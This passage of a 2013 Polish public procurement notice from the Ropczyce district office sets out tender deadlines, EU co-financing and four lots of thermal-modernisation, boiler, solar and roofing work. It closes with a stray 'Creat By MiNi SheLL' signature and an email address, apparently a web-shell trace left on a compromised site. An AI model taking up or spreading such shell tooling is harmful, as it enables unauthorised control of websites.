13. Zamawiający dopuszcza wprowadzenie w przyszłej umowie wszelkich nieistotnych zmian jej postanowień w stosunku do treści oferty. Za zmiany nieistotne Zamawiający uznaje takie zmiany, co do których wiedza na etapie przygotowania postępowania nie miałaby wpływu na 	potencjalnych wykonawców lub na wynik postępowania.

14. Wszelkie zmiany wymagają zgody zamawiającego i wykonawcy w formie sporządzonego i podpisanego aneksu pod rygorem nieważności. Zmiana określona w pkt. 16.4.5 siwz nie  wymaga zawarcia aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.spropczyce.pl/tablica_ogloszen/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Ropczycach, 39-100 Ropczyce, ul. Konopnickiej 5 - pok. 225 - 226.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2013 godzina 10:00, miejsce: Starostwo Powiatowe w Ropczycach, 39-100 Ropczyce, ul. Konopnickiej 5 - pok. 314 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013
Oś priorytetowa 2 - Infrastruktura publiczna
Działanie 2.2 - Infrastruktura energetyczna.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Termomodernizacja budynku warsztatów szkolnych Zespołu Szkół Agro - Technicznych                    w Ropczycach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:

a) docieplenie ścian nadziemia
b) docieplenie ścian poniżej terenu
c) docieplenie stropodachu
d) wymiana stolarki okiennej drewnianej
e) instalacja c.o.

Zakres prac, sposób wykonania robót budowlanych, rodzaj materiałów i urządzeń określają szczegółowo: dokumentacja projektowa (załącznik nr 9.1 do siwz), Specyfikacje Techniczne Wykonania  i Odbioru Robót Budowlanych (załącznik nr 8.1 do siwz) i przedmiary robót (załącznik nr 1.1 do siwz),.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.42.10.00-4, 45.33.12.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 1. Przebudowa kotłowni gazowej oraz budowa instalacji solarnej w Domu Pomocy Społecznej w Rudzie
2. Modernizacja kotłowni gazowej, budowa instalacji solarnej i modułu kogeneracyjnego                    w Domu Pomocy Społecznej w Lubzinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:

Ad 1) 

a) roboty budowlane w kotłowni
b) wzmocnienie konstrukcji dachu
c) montaż zasilania elektrycznego instalacji solarnej - montaż zasilania
d) montaż zasilania elektrycznego instalacji solarnej - montaż rozdzielni
e) montaż zasilania elektrycznego instalacji solarnej - montaż przewodów i osprzętu
f) montaż instalacji detekcji gazu - montaż przewodów
g) montaż instalacji detekcji gazu - montaż aparatów
h) instalacja połączeń wyrównawczych
i) montaż instalacji odgromowej
j) wymiana urządzeń kotłowni gazowej
k) system bezpieczeństwa instalacji gazowej
l) instalacja solarna - obieg solarny
ł) instalacja solarna - obieg grzewczy - ładowanie bufora
m) instalacja solarna - obieg grzewczy - rozładowanie bufora
n) instalacja solarna - obieg wstępnego podgrzewu c.w.u.
o) instalacja solarna - rurociągi
p) roboty pozostałe


Zakres prac, sposób wykonania robót budowlanych, rodzaj materiałów i urządzeń określają szczegółowo: dokumentacja projektowa (załącznik nr 9.2.1 do siwz), Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (załącznik nr 8.2.1 do siwz) i przedmiary robót (załącznik nr 1.2.1 do siwz),  

Ad. 2)

a) modernizacja kotłowni - wbudowanie instalacji solarnej i modułu kogeneracyjnego
b) budowa modułu kogeneracyjnego i instalacji solarnej - instalacja c.o.
c) instalacja kolektorów słonecznych 
d) instalacja wody
e) instalacja gazu
f) instalacja wentylacyjna i spalinowa
g) roboty budowlane

Zakres prac, sposób wykonania robót budowlanych, rodzaj materiałów i urządzeń określają szczegółowo: dokumentacja projektowa (załącznik nr 9.2.2 do siwz), Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (załącznik nr 8.2.2 do siwz) i przedmiary robót (załącznik nr 1.2.2 do siwz),  
UWAGA: Przy ustalaniu właściwej stawki podatku VAT dla części 2 zamówienia należy uwzględnić fakt, że roboty budowlane będą prowadzone w budynkach sklasyfikowanych według PKOB w grupowaniu 1130 (budynek domu pomocy społecznej) Roboty budowlane będą realizowane w części budynków trwale związanych z konstrukcją tego budynku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.00.00-3, 45.33.30.00-0, 45.33.11.10-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 1. Termomodernizacja budynku Ośrodka Zdrowia w Zagorzycach
2. Budowa dachu na budynku Ośrodka Zdrowia w Zagorzycach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:

Ad 1)

a) wymiana stolarki okiennej i drzwiowej
b) wykonanie izolacji zewnętrznej ścian piwnic
c) elewacja
d) ościeża
e) wywóz i utylizacja gruzu - roboty elewacyjne
f) instalacja odgromowa
g) rusztowania
h) instalacja c.o.
i) instalacja solarna
j) wewnętrzna instalacja gazu

Zakres prac, sposób wykonania robót budowlanych, rodzaj materiałów i urządzeń określają szczegółowo: dokumentacja projektowa (załącznik nr 9.3.1 do siwz), Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (załącznik nr 8.3.1 do siwz) i przedmiary robót (załącznik nr 1.3.1 do siwz),  

Ad 2)

a) remont stropodachu
b) roboty rozbiórkowe
c) konstrukcje dachowe
d) pokrycie dachu blachą dachówkopodobną
e) obróbki

Zakres prac, sposób wykonania robót budowlanych, rodzaj materiałów i urządzeń określają szczegółowo:,  dokumentacja projektowa (załącznik nr 9.3.2 do siwz), Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (załącznik nr 8.3.2 do siwz) i przedmiary robót (załącznik nr 1.3.2 do siwz)
Z uwagi na odrębne źródła finansowania Zamawiający w części 3 i 4 zamówienia zawrze z wybranym Wykonawcą dwie umowy. Osobną na termomodernizację budynków oraz osobną  na budowę dachów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.42.10.00-4, 45.11.12.20-6, 45.31.70.00-2, 45.26.21.00-2, 45.32.10.00-3, 45.26.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> 1. Termomodernizacja budynku Ośrodka Zdrowia w Iwierzycach
2. Budowa dachu na budynku Ośrodka Zdrowia w Iwierzycach
uwagi na odrębne źródła finansowania Zamawiający w części 3 i 4 zamówienia zawrze z wybranym Wykonawcą dwie umowy. Osobną na termomodernizację budynków oraz osobną  na budowę dachów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:

Ad. 1)

a) wymiana stolarki piwnicznej
b) wykonanie izolacji zewnętrznej ścian piwnic
c) elewacja
d) ościeża elewacji
e) remont wejścia do przychodni
f) remont murków przy wjeździe do garażu
g) wywóz i utylizacja gruzu - roboty elewacyjne
h) instalacja odgromowa
i) rusztowania
j) zadaszenie nad wejściami
k) remont balkonów
l) zadaszenia nad balkonami
ł) instalacja solarna
m) wewnętrzna instalacja gazu
n) instalacja c.o.

Zakres prac, sposób wykonania robót budowlanych, rodzaj materiałów i urządzeń określają szczegółowo: dokumentacja projektowa (załącznik nr 9.4.1 do siwz), Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (załącznik nr 8.4.1 do siwz) i przedmiary robót (załącznik nr 1.4.1 do siwz),  
Ad 2)

a) remont stropodachu
b) roboty rozbiórkowe
c) konstrukcje dachowe
d) pokrycie dachu blachą dachówkopodobną
e) obróbki

Zakres prac, sposób wykonania robót budowlanych, rodzaj materiałów i urządzeń określają szczegółowo: dokumentacja projektowa (załącznik nr 9.4.2 do siwz,  Specyfikacje Techniczne Wykonania  i Odbioru Robót Budowlanych (załącznik nr 8.4.2 do siwz) i przedmiary robót (załącznik nr 1.4.2 do siwz),  

Z uwagi na odrębne źródła finansowania Zamawiający w części 3 i 4 zamówienia zawrze z wybranym Wykonawcą dwie umowy. Osobną na termomodernizację budynków oraz osobną  na budowę dachów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.42.10.00-4, 45.11.12.20-6, 45.31.70.00-2, 45.26.21.00-2, 45.32.10.00-3, 45.26.10.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com